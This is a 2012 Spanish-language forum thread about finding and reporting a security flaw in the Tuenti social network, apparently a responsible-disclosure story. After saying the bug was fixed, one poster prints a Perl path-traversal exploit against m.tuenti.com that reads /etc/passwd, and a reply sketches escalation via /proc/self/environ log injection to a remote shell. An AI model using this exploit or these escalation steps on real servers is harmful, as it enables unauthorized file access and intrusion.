elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Fallo de seguridad en tuenti.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Fallo de seguridad en tuenti.  (Leído 4,805 veces)
WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Fallo de seguridad en tuenti.
« en: 30 Mayo 2012, 18:17 pm »

Buenos, no se si alguien sabe la dirección de correo electrónico que utiliza la red social tuenti para reportar fallos de seguridad o bien si es como facebook que tiene un sistema de reportes web.

Un saludo y gracias! y si alguien tiene alguna experiencia reportado fallos de seguridad en esta red social... que me comente su experiencia.

Gracias un saludo
« Última modificación: 1 Junio 2012, 10:35 am por WarGhost » En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Reportar fallo de seguridad tuenti.
« Respuesta #1 en: 30 Mayo 2012, 18:28 pm »

Habla con dimitrix:

Tuenti XSS – Zero Day (15/09/2010)
http://foro.elhacker.net/nivel_web/tuenti_xss_%E2%80%93_zero_day_15092010-t304961.0.html

Deberia publicar una vulnerabilidad muy seria?
http://foro.elhacker.net/foro_libre/deberia_publicar_una_vulnerabilidad_muy_seria-t328814.0.html
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Reportar fallo de seguridad tuenti.
« Respuesta #2 en: 30 Mayo 2012, 18:40 pm »

Muchas gracias el-brujo, la verdad es como puso lipman en su hilo, me gustaría publicarlo pero no sin antes esperar como mínimo a que este arreglado.

Ahora contactare con dimitrix y que me cuente sus experiencias, que parece que tiene muchas jajaja
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Reportar fallo de seguridad tuenti.
« Respuesta #3 en: 31 Mayo 2012, 14:49 pm »

Bueno le pase el error a diminitrix y el contacto con el encargado de seguridad, tambien se lo envié chica de elpais tecnología y ella contacto con tuenti, a las dos horas de hacerlo ya lo arreglaron.

El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).

Este era el exploit que utlizaba:

Código:
#!/usr/bin/perl
use IO::Socket::INET;

$host = "m.tuenti.com";
$attack = "../../../../../../../etc/passwd";

my $sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
 
print $sock $request . "GET /?m=" . $attack ."%00 HTTP/1.1\r\n"
. "Host: " . $host ."\r\n"
. "Connection: Close\r\n\r\n";

while($line = <$sock>) {  print $line;  }

« Última modificación: 1 Junio 2012, 15:06 pm por WarGhost » En línea

tremolero

Desconectado Desconectado

Mensajes: 270


Ver Perfil
Re: Reportar fallo de seguridad tuenti.
« Respuesta #4 en: 31 Mayo 2012, 15:57 pm »

Oye warghost, una pregunta, como llegaste hasta la vulnerabilidad?

Y como de grave es esta vulnerabilidad? porque te permitia leer archivos que tuviera permisos, pero perfectamente podrias no ver nada, no?


Saludos...
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Reportar fallo de seguridad tuenti.
« Respuesta #5 en: 31 Mayo 2012, 16:05 pm »

Pues encontré la vulnerabilidad probando, estaba analizando como estaba montada tuenti y bueno salio eso.

La gravedad de este tipo de vulnerabilidades es de las mas altas ya que si no es por un sitio puede ser por otro, se podría llegar a inyectar código php desde el user-agent y /proc/self/environ, también desde las sesiones e inyectar una shell remota, mirar archivos de configuración etc...
La verdad una vez encontré la vulnerabilidad simplemente la quise reportar, porque ya sabéis como son estas empresas u.u.

En fin... que no venden de que tienen nuestros datos protegidos, pero vamos cuento chino :S.
En línea

tremolero

Desconectado Desconectado

Mensajes: 270


Ver Perfil
Re: Reportar fallo de seguridad tuenti.
« Respuesta #6 en: 31 Mayo 2012, 16:15 pm »

ay va!, xD pues es mas grave esa vulnerabilidad de lo que yo pensaba.
Pues si, hicistes bien en reportar, que seguro que llamas para decir que has encontrado un fallo y te meten en la carcel xD

buff... llevo mucho tiempo perdido, me voy a tener que poner manos a la obra ^^.

Por cierto, no te pueden considerar una amenaza al analizar como ellos tienen montado tuenti? mas que nada para prevenir ante cualquier problema ^^.

Saludos...
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fallo de seguridad en Battle.net
Seguridad
erawlam 1 2,080 Último mensaje 10 Agosto 2012, 13:51 pm
por r32
Fallo brutal en Tuenti
Foro Libre
dimitrix 9 4,090 Último mensaje 26 Septiembre 2012, 20:02 pm
por d(-_-)b
Multa a Sony por un fallo de seguridad
Noticias
wolfbcn 0 1,252 Último mensaje 24 Enero 2013, 12:58 pm
por wolfbcn
Fallo de seguridad en Blackberry OS 10
Noticias
wolfbcn 0 1,177 Último mensaje 19 Junio 2013, 14:46 pm
por wolfbcn
Probar la seguridad de elhacker.net y reportar cualquier falla está bien visto?
Dudas Generales
Schaiden 2 2,006 Último mensaje 15 Agosto 2019, 21:37 pm
por simorg
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines